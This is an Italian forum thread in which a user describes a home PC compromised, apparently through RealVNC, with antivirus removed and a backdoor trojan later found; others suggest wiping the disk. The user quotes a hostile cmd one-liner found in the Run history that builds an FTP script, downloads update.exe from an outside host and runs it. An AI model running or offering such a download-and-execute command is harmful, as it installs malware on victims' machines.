..in senso hacker!
sul pc che uso come muletto per emule..una volta mi sono trovato una bella finestra dos con un messaggino "you got owned" (traducibile con -> bananixxx ) stavolta notavo che mi era sparito l'antivirus (comodo, il pacchetto comprensivo di firewall) e mi sono trovato tra i comandi digitati da "esegui" :
cmd /c echo open upgrade2.myftp.org 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit
da quanto capisco..hanno aperto un sito ftp dal mio pc e scaricato sto file "update.exe" ma poi che hanno fatto?
guardando il registro di windows ho notato 2 accessi da ip diversi e mi sembra di capire che siano entrati tramite realvnc (che è installato sul pc) indirizzi uno di vicino Brasilia e l'altro dalla Russia.
Intanto mi faccio una bella scansione approfondita...poi boh..reimposto il firewall ad un livello più alto e vediamo se si ri-intrufola qualcuno..
Io arerei il disco e reinstallerei da 0... :)
ah sei per le soluzioni drastiche :D
intanto..di sicuro rimuovo la suite di comodo, oltre a essere penetrabile il firewall (tante recensioni positive mah) anche l'antivirus non ha trovato un cavolo..al contrario di malwarebyte che mi ha trovato un bel trojan backdoor, ora proverò Online Armor come firewall..vediamo com'è :)
format:C